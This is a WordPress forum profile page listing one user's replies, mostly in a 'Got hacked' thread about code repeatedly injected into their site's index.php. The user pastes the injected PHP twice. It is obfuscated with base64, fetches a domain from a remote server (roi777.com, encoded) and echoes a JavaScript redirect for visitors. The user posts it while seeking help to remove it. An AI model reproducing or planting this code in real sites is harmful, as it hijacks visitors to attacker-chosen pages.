kirai
Forum Replies Created
-
Forum: Themes and Templates
In reply to: [Twenty Seventeen] Make images in posts widerHello,
Thank you @mezhouwf.
This seems to do the trick:
add_action( ‘after_setup_theme’, ‘prima_twentyseventeen_setup’,11 ); function prima_twentyseventeen_setup() { $GLOBALS[‘content_width’] = 800; }I’m wondering if there is any way to do the same think without changing code inside functions.php
It seems to that it is a bad design decision to set that width fixed inside the theme php code instead of being on the css “layer”
Forum: Fixing WordPress
In reply to: Got hackedThank you all, I moved to a new server, problem solved 🙂 But it seems blocking all .tk solved the problem also.
Forum: Fixing WordPress
In reply to: Got hackedThank you always afleetingglimpse !
I’ve blocked all .tk and I’m going to look into wordfence premium.
Forum: Fixing WordPress
In reply to: Got hackedThis is the new code, how to I know the target when new code is inserted?
$id6fe1d0be634 = "/index/?2601510941471"; $z8c7dd922ad47=md5($id6fe1d0be634);$u77e8e1445762=time();$geaa082fa5781=filemtime($z8c7dd922ad47);$u07cc694b9b3f=$u77e8e1445762-$geaa082fa5781;if(file_exists($z8c7dd922ad47)){$fe1260894f59e=@fopen($z8c7dd922ad47,base64_decode('cg=='));$xe4e46deb7f9c=json_decode(base64_decode(fread($fe1260894f59e,filesize($z8c7dd922ad47))),1);fclose($fe1260894f59e);}if($u07cc694b9b3f>=60 ||!file_exists($z8c7dd922ad47)){$v9b207167e538=getDDroi($z8c7dd922ad47);if($v9b207167e538[base64_decode('ZG9tYWlu')]){$je617ef6974fa=base64_decode('aHR0cDovLw==').$v9b207167e538[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}else{$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcnNydg=='));curl_setopt($wd88fc6edf21e,CURLOPT_URL,$xe4e46deb7f9c[base64_decode('cnNydg==')]);curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sad5f82e879a9=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$je617ef6974fa=base64_decode('aHR0cDovLw==').$sad5f82e879a9.$id6fe1d0be634;}}else{$je617ef6974fa=base64_decode('aHR0cDovLw==').$xe4e46deb7f9c[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}function getDDroi($z8c7dd922ad47){$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcm9p'));curl_setopt($wd88fc6edf21e,CURLOPT_URL,base64_decode('aHR0cDovL3JvaTc3Ny5jb20vZG9tYWluX3RlbXAucGhwP2Y9anNvbg=='));curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sb4a88417b3d0=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$xe4e46deb7f9c=json_decode($sb4a88417b3d0,true);if($xe4e46deb7f9c[base64_decode('ZG9tYWlu')]){$y0666f0acdeed=@fopen($z8c7dd922ad47,base64_decode('dys='));@fwrite($y0666f0acdeed,base64_encode($sb4a88417b3d0));@fclose($y0666f0acdeed);return $xe4e46deb7f9c;}else return false;}if(!$_COOKIE[base64_decode('YTc3N2Q=')]){setcookie(base64_decode('YTc3N2Q='),1,time()+43200,base64_decode('Lw=='));echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi').$je617ef6974fa.base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi').$je617ef6974fa.base64_decode('Ijs8L3NjcmlwdD4=');}Forum: Fixing WordPress
In reply to: Got hackedI even change the permissions of the index file to 444 and it changes to 644 and the code is inserted.
Forum: Fixing WordPress
In reply to: Got hackedHello! I added all the ips and ip ranges of the suspicious sites mentioned and it stoped it for more than 48 hours… but now the inserted code is back again.
Any more ideas of what I should do?
Forum: Fixing WordPress
In reply to: Got hackedThis is the complete line of code that is being inserted in my index.php, now it seems to be happening several times per 24 hours.
<?php $id6fe1d0be634 = "/index/?2601510941471"; $z8c7dd922ad47=md5($id6fe1d0be634);$u77e8e1445762=time();$geaa082fa5781=filemtime($z8c7dd922ad47);$u07cc694b9b3f=$u77e8e1445762-$geaa082fa5781;if(file_exists($z8c7dd922ad47)){$fe1260894f59e=@fopen($z8c7dd922ad47,base64_decode('cg=='));$xe4e46deb7f9c=json_decode(base64_decode(fread($fe1260894f59e,filesize($z8c7dd922ad47))),1);fclose($fe1260894f59e);}if($u07cc694b9b3f>=60 ||!file_exists($z8c7dd922ad47)){$v9b207167e538=getDDroi($z8c7dd922ad47);if($v9b207167e538[base64_decode('ZG9tYWlu')]){$je617ef6974fa=base64_decode('aHR0cDovLw==').$v9b207167e538[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}else{$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcnNydg=='));curl_setopt($wd88fc6edf21e,CURLOPT_URL,$xe4e46deb7f9c[base64_decode('cnNydg==')]);curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sad5f82e879a9=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$je617ef6974fa=base64_decode('aHR0cDovLw==').$sad5f82e879a9.$id6fe1d0be634;}}else{$je617ef6974fa=base64_decode('aHR0cDovLw==').$xe4e46deb7f9c[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}function getDDroi($z8c7dd922ad47){$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcm9p'));curl_setopt($wd88fc6edf21e,CURLOPT_URL,base64_decode('aHR0cDovL3JvaTc3Ny5jb20vZG9tYWluX3RlbXAucGhwP2Y9anNvbg=='));curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sb4a88417b3d0=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$xe4e46deb7f9c=json_decode($sb4a88417b3d0,true);if($xe4e46deb7f9c[base64_decode('ZG9tYWlu')]){$y0666f0acdeed=@fopen($z8c7dd922ad47,base64_decode('dys='));@fwrite($y0666f0acdeed,base64_encode($sb4a88417b3d0));@fclose($y0666f0acdeed);return $xe4e46deb7f9c;}else return false;}if(!$_COOKIE[base64_decode('YTc3N2Q=')]){setcookie(base64_decode('YTc3N2Q='),1,time()+43200,base64_decode('Lw=='));echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi').$je617ef6974fa.base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi').$je617ef6974fa.base64_decode('Ijs8L3NjcmlwdD4=');}- This reply was modified 7 years, 11 months ago by kirai.
Forum: Fixing WordPress
In reply to: Got hackedHello, thank you @afleetinglimpse!
Unfortunately I added all those rules to my .httaccess and changed all passwords again. After several ours they inserted the code again the first line of my index.php, this means that they are not really logging in to insert the code?
- This reply was modified 7 years, 11 months ago by kirai.
Forum: Fixing WordPress
In reply to: Got hackedThe problem persists, the index.php is being edited every 24h or so.
I have changed all passwords several times and Wordfence is also running 24/7
Forum: Fixing WordPress
In reply to: Got hackedThe index.php keeps being edited everyday with the same inserted code even thought I have changed all my passwords. There is nothing in my crontab and also I’ve made sure there are not active plugins except wordfence.
How do I know what process is editing the index.php?
Forum: Fixing WordPress
In reply to: Got hackedFixed the problem again… I thin… My index.php file had code inserted at the beginning starting like this:
<?php $id6fe1d0be634 = "/index/?2601510941471"; $z8c7dd922ad47=md5( .......before the line: define(‘WP_USE_THEMES’, true);
Forum: Fixing WordPress
In reply to: Got hackedReopening since the problem persists.
– I reinstalled wordpress
– Reviewed .htaccess file (no issues with it)
– Installed Wordfence and run the scan (no issues with it)
– Changed all passwords: ftp, hosting, wordpress to superlong ones 🙂Still getting a redirect to external site when loading http://www.ageekinjapan.com (First time once per session?), Opening a private window on the browser and opening the site )
Forum: Fixing WordPress
In reply to: Got hackedThank you!!!
I also have a very similar warning on my site error.log . Also the same day.
[12-Sep-2016 13:18:40 UTC] PHP Warning: array_unshift() expects parameter 1 to be array, null given in /home/*/public_html/wp-includes/class-wp-xmlrpc-server.php on line 596 [17-Sep-2016 05:51:35 America/Chicago] PHP Warning: require(ABSPATHwp-includes/load.php) [<a href='function.require'>function.require</a>]: failed to open stream: No such file or directory in /home/*/public_html/wp-settings.php on line 21